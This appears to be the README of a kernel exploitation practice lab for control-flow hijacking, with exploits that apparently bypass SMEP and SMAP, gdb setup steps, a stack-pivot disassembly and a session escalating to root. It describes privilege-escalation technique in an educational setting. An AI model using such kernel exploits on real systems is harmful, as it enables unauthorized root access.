A stand for practicing CFHjack in the Linux kernel

The purpose of this project is to provide a safe and controlled environment for learning about Linux kernel security and exploiting vulnerabilities.

Control Flow Hjack is a well-known problem in Linux kernel security so there are various mitigations. This project aims to provide a hands-on environment for learning about these topics and practicing exploitation techniques.

• nothing.c works only without mitigations
• smep.c beats down the SMEP
• smap.c wins both: SMEP and SMAP

Get a script to retrieve vmlinux form bzImage:

wget https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/plain/scripts/extract-vmlinux -O extract-vmlinux.sh

Extract vmlinux:

bash extract-vmlinux.sh bzImage > vmlinux

In the first terminal, run:

bash run.sh
y
y

Then, in the second one:

gdb vmlinux
target remote 127.0.0.1:1234
break *0xffffffffc0000057
c

Return to the VM (1st terminal):

./smap

And here we are! Watch the kernel buffer overflow!

────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────

 ► 0xffffffffc0000057    ret                                <0xffffffff81784532>
    ↓
   0xffffffff81784532    mov    esp, 0x83000000		    ESP => 0x83000000
   0xffffffff81784537    ret

For example, here you can see the stack pivoting technique. Simply press c in gdb to achieve root.

/exp $ id
uid=1000(chal) gid=1000(chal) groups=1000(chal)
/exp $ grep -o -E "smep|smap" /proc/cpuinfo 
smep
smap
/exp $ id
uid=1000(chal) gid=1000(chal) groups=1000(chal)
/exp $ ./smap
[+] device opened
[+] the flow is defeated!
/exp # id
uid=0(root) gid=0(root)
/exp #